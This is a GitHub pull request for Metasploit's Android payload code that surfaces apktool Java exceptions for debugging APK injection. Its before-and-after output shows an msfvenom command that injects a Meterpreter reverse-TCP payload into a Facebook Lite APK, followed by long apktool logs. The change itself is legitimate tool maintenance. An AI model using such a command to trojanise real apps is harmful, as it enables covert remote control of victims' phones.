Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Msf::Payload::Apk: raise if apktool output includes Java exceptions #16288

Merged
merged 1 commit into from
Mar 6, 2022
Merged

Msf::Payload::Apk: raise if apktool output includes Java exceptions #16288

merged 1 commit into from
Mar 6, 2022

Conversation

bcoles
Copy link
Contributor

@bcoles bcoles commented Mar 5, 2022

There's already error handling for the final step of rebuilding the APK file with apktool. Prior steps (such as decompiling the original APK and payload APK) are unlikely to fail, but if they do, the lack of debug output makes issues extremely tedious to debug.

Printing apktool output assists with debugging and report issues (most likely issues in apktool itself) significantly easier.

@timwr timwr self-assigned this Mar 6, 2022
@timwr
Copy link
Contributor

timwr commented Mar 6, 2022

LGTM. I was able to reproduce an error by adding a broken symlink at ~/.local/share/apktool/framework/1.apk

Before

$ msfvenom -x facebook-lite.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o out.apk
Using APK template: facebook-lite.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
Error: undefined method `[]' for nil:NilClass

After

$ msfvenom -x facebook-lite.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o out.apk
Using APK template: facebook-lite.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[-] I: Using Apktool 2.6.0 on original.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
W: Could not decode attr value, using undecoded value instead: ns=android, name=versionCode, value=0x14fe81c3
W: Could not decode attr value, using undecoded value instead: ns=android, name=versionName, value=0x000000dd
W: Could not decode attr value, using undecoded value instead: ns=android, name=versionCode, value=0x14fe81c3
W: Could not decode attr value, using undecoded value instead: ns=android, name=versionName, value=0x000000dd
W: Could not decode attr value, using undecoded value instead: ns=android, name=compileSdkVersion, value=0x0000001f
W: Could not decode attr value, using undecoded value instead: ns=android, name=compileSdkVersionCodename, value=0x000000db
W: Could not decode attr value, using undecoded value instead: ns=android, name=minSdkVersion, value=0x0000000f
W: Could not decode attr value, using undecoded value instead: ns=android, name=targetSdkVersion, value=0x0000001e
W: Could not decode attr value, using undecoded value instead: ns=android, name=anyDensity, value=0xffffffff
W: Could not decode attr value, using undecoded value instead: ns=android, name=smallScreens, value=0xffffffff
W: Could not decode attr value, using undecoded value instead: ns=android, name=normalScreens, value=0xffffffff
W: Could not decode attr value, using undecoded value instead: ns=android, name=largeScreens, value=0xffffffff
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000ea
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000eb
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000f0
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000ef
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000ec
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000ee
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000ed
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000f2
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000000f1
W: Could not decode attr value, using undecoded value instead: ns=android, name=required, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000199
W: Could not decode attr value, using undecoded value instead: ns=android, name=protectionLevel, value=0x00000002
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000198
W: Could not decode attr value, using undecoded value instead: ns=android, name=protectionLevel, value=0x00000002
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000104
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000105
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000106
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000107
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000109
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000010b
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000010c
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000010d
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000010e
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000010f
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000112
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000113
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000116
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000115
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000117
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000111
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000108
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000114
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000119
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000118
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000011a
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000011b
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000011c
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000011f
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000011e
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000121
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000122
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000123
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000124
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000125
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000012e
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000012f
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000178
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000199
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000141
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000190
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000018f
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001aa
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000198
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001c5
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001c4
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001bd
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001be
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001c6
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001c7
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001bf
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001c0
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001c1
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001c2
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001c3
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000011d
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000120
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000135
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001a3
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001a2
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000110
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001af
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000102
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001ad
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000178
W: Could not decode attr value, using undecoded value instead: ns=android, name=protectionLevel, value=0x00000002
W: Could not decode attr value, using undecoded value instead: ns=android, name=theme, value=0x7f0e0017
W: Could not decode attr value, using undecoded value instead: ns=android, name=label, value=0x7f0d0002
W: Could not decode attr value, using undecoded value instead: ns=android, name=icon, value=0x7f0b0000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x00000144
W: Could not decode attr value, using undecoded value instead: ns=android, name=manageSpaceActivity, value=0x0000018a
W: Could not decode attr value, using undecoded value instead: ns=android, name=debuggable, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=allowBackup, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=vmSafeMode, value=0x7f040000
W: Could not decode attr value, using undecoded value instead: ns=android, name=hardwareAccelerated, value=0xffffffff
W: Could not decode attr value, using undecoded value instead: ns=android, name=supportsRtl, value=0xffffffff
W: Could not decode attr value, using undecoded value instead: ns=android, name=networkSecurityConfig, value=0x7f100001
W: Could not decode attr value, using undecoded value instead: ns=android, name=appComponentFactory, value=0x00000128
W: Could not decode attr value, using undecoded value instead: ns=android, name=requestLegacyExternalStorage, value=0xffffffff
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x000001ab
W: Could not decode attr value, using undecoded value instead: ns=android, name=value, value=0x00000000
W: Could not decode attr value, using undecoded value instead: ns=android, name=name, value=0x0000013d
W: Could not decode attr value, using undecoded value instead: ns=android, name=value, value=0x00000127
Exception in thread "main" java.lang.NullPointerException
        at java.util.regex.Matcher.getTextLength(Matcher.java:1283)
        at java.util.regex.Matcher.reset(Matcher.java:309)
        at java.util.regex.Matcher.<init>(Matcher.java:229)
        at java.util.regex.Pattern.matcher(Pattern.java:1093)
        at brut.androlib.res.decoder.AndroidManifestResourceParser.isNumericStringMetadataAttributeValue(AndroidManifestResourceParser.java:56)
        at brut.androlib.res.decoder.AndroidManifestResourceParser.getAttributeValue(AndroidManifestResourceParser.java:41)
        at org.xmlpull.v1.wrapper.classic.XmlPullParserDelegate.getAttributeValue(XmlPullParserDelegate.java:69)
        at org.xmlpull.v1.wrapper.classic.StaticXmlSerializerWrapper.writeStartTag(StaticXmlSerializerWrapper.java:267)
        at org.xmlpull.v1.wrapper.classic.StaticXmlSerializerWrapper.event(StaticXmlSerializerWrapper.java:211)
        at brut.androlib.res.decoder.XmlPullStreamDecoder$1.event(XmlPullStreamDecoder.java:80)
        at brut.androlib.res.decoder.XmlPullStreamDecoder.decode(XmlPullStreamDecoder.java:139)
        at brut.androlib.res.decoder.XmlPullStreamDecoder.decodeManifest(XmlPullStreamDecoder.java:151)
        at brut.androlib.res.decoder.ResFileDecoder.decodeManifest(ResFileDecoder.java:159)
        at brut.androlib.res.AndrolibResources.decodeManifestWithResources(AndrolibResources.java:193)
        at brut.androlib.Androlib.decodeManifestWithResources(Androlib.java:140)
        at brut.androlib.ApkDecoder.decode(ApkDecoder.java:109)
        at brut.apktool.Main.cmdDecode(Main.java:175)
        at brut.apktool.Main.main(Main.java:78)
Error: apktool execution failed

@timwr timwr merged commit 2560aa3 into rapid7:master Mar 6, 2022
@timwr
Copy link
Contributor

timwr commented Mar 6, 2022
edited by jmartin-tech
Loading

Release notes

This change display the output of apktool if the apktool output contains Java exceptions, which is useful for debugging errors in Android APK injection.

@bcoles bcoles deleted the payload-apk-apktool branch March 6, 2022 08:40
@smcintyre-r7 smcintyre-r7 added the rn-enhancement release notes enhancement label Mar 10, 2022
This pull request was closed.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@timwr timwr

Labels
android payload rn-enhancement release notes enhancement
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@bcoles @timwr @smcintyre-r7